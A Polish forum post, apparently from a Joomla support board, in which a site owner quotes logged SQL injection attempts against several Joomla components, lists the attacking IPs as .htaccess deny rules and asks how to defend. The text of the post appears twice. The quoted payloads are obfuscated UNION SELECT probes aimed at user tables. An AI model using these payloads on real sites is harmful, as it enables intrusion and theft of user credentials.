sstanczuk
09-01-2012, 11:31
Witam
Od kilku tygodni z wielu moich stron joomla dostaje komunikaty o próbie wstrzyknięcia kodu w adres strony.
Są to np:
*QUERY_STRING :
option=com_catalogproduction&task=viewdetail&id=-9999%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsE leCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2Cnull%2C null%2C6%2C7%2C8%2C9%2C0%2C11%2C12%2C13%2C14%2C15% 2C16%2C17%2Cnull%2C19%2C20%2F%2A%2A%2FfRoM%2F%2A%2 A%2Fmos_users--
*QUERY_STRING :
option=com_acteammember&Itemid=121&lang=en&id=-1/**/uNiOn/**/sELeCt/**/1,2,3,4,5,0x33633273366962,7,8,9,10,11,12,13,14,15/**/fRoM/**/mos_users--
*QUERY_STRING :
option=com_acteammember&Itemid=121&lang=en&id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1% 2C2%2C3%2C4%2C5%2C0x33633273366962%2C7%2C8%2C9%2C1 0%2C11%2C12%2C13%2C14%2C15%2F%2A%2A%2FfRoM%2F%2A%2 A%2Fmos_users--
*QUERY_STRING :
option=com_joomdle&view=detail&cat_id=1&course_id=-999.9%27%2F%2A%2A%2FuNiOn%2F%2A%2A%2FAlL%2F%2A%2A% 2FsElEcT%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C0x33633273 366962%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2 C16%2C17%2C18%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmdl_user--
*QUERY_STRING :
option=com_rsgallery&page=inline&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1% 2C2%2C3%2C4%2C0x33633273366962%2C6%2C7%2C8%2C9%2C1 0%2C11%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos__users--
i tak dalej ....
Próby wykonano na kilkadziesiąt komponentów przez jakiś automat z IP:
Deny from 96.9.149.86
Deny from 96.9.169.236
Deny from 96.9.169.224
Deny from 96.9.173.62
Deny from 96.9.173.14
Deny from 96.9.173.58
Deny from 96.9.173.48
Deny from 64.191.13.150
Deny from 64.191.13.146
Deny from 64.191.99.110
Deny from 64.191.99.74
Deny from 64.191.99.120
Deny from 64.191.99.123
Deny from 66.197.227.162
Deny from 66.197.227.181
Deny from 66.197.227.170
Deny from 66.197.227.156
Deny from 66.197.227.134
Deny from 66.197.227.185
Deny from 66.197.227.184
Deny from 66.197.172.242
Deny from 173.212.195.14
Deny from 173.212.195.40
Deny from 173.212.195.34
Deny from 173.212.197.54
Deny from 173.212.197.30
Deny from 173.212.209.246
Deny from 173.212.209.220
Deny from 173.212.209.216
Deny from 173.212.235.62
Deny from 173.212.235.38
Deny from 173.212.235.34
Deny from 173.212.254.12
Czy ktoś się spotkał z podobną sytuacją? Jak się przed nią bronić?
Od kilku tygodni z wielu moich stron joomla dostaje komunikaty o próbie wstrzyknięcia kodu w adres strony.
Są to np:
*QUERY_STRING :
option=com_catalogproduction&task=viewdetail&id=-9999%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsE leCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2Cnull%2C null%2C6%2C7%2C8%2C9%2C0%2C11%2C12%2C13%2C14%2C15% 2C16%2C17%2Cnull%2C19%2C20%2F%2A%2A%2FfRoM%2F%2A%2 A%2Fmos_users--
*QUERY_STRING :
option=com_acteammember&Itemid=121&lang=en&id=-1/**/uNiOn/**/sELeCt/**/1,2,3,4,5,0x33633273366962,7,8,9,10,11,12,13,14,15/**/fRoM/**/mos_users--
*QUERY_STRING :
option=com_acteammember&Itemid=121&lang=en&id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1% 2C2%2C3%2C4%2C5%2C0x33633273366962%2C7%2C8%2C9%2C1 0%2C11%2C12%2C13%2C14%2C15%2F%2A%2A%2FfRoM%2F%2A%2 A%2Fmos_users--
*QUERY_STRING :
option=com_joomdle&view=detail&cat_id=1&course_id=-999.9%27%2F%2A%2A%2FuNiOn%2F%2A%2A%2FAlL%2F%2A%2A% 2FsElEcT%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C0x33633273 366962%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2 C16%2C17%2C18%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmdl_user--
*QUERY_STRING :
option=com_rsgallery&page=inline&catid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1% 2C2%2C3%2C4%2C0x33633273366962%2C6%2C7%2C8%2C9%2C1 0%2C11%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos__users--
i tak dalej ....
Próby wykonano na kilkadziesiąt komponentów przez jakiś automat z IP:
Deny from 96.9.149.86
Deny from 96.9.169.236
Deny from 96.9.169.224
Deny from 96.9.173.62
Deny from 96.9.173.14
Deny from 96.9.173.58
Deny from 96.9.173.48
Deny from 64.191.13.150
Deny from 64.191.13.146
Deny from 64.191.99.110
Deny from 64.191.99.74
Deny from 64.191.99.120
Deny from 64.191.99.123
Deny from 66.197.227.162
Deny from 66.197.227.181
Deny from 66.197.227.170
Deny from 66.197.227.156
Deny from 66.197.227.134
Deny from 66.197.227.185
Deny from 66.197.227.184
Deny from 66.197.172.242
Deny from 173.212.195.14
Deny from 173.212.195.40
Deny from 173.212.195.34
Deny from 173.212.197.54
Deny from 173.212.197.30
Deny from 173.212.209.246
Deny from 173.212.209.220
Deny from 173.212.209.216
Deny from 173.212.235.62
Deny from 173.212.235.38
Deny from 173.212.235.34
Deny from 173.212.254.12
Czy ktoś się spotkał z podobną sytuacją? Jak się przed nią bronić?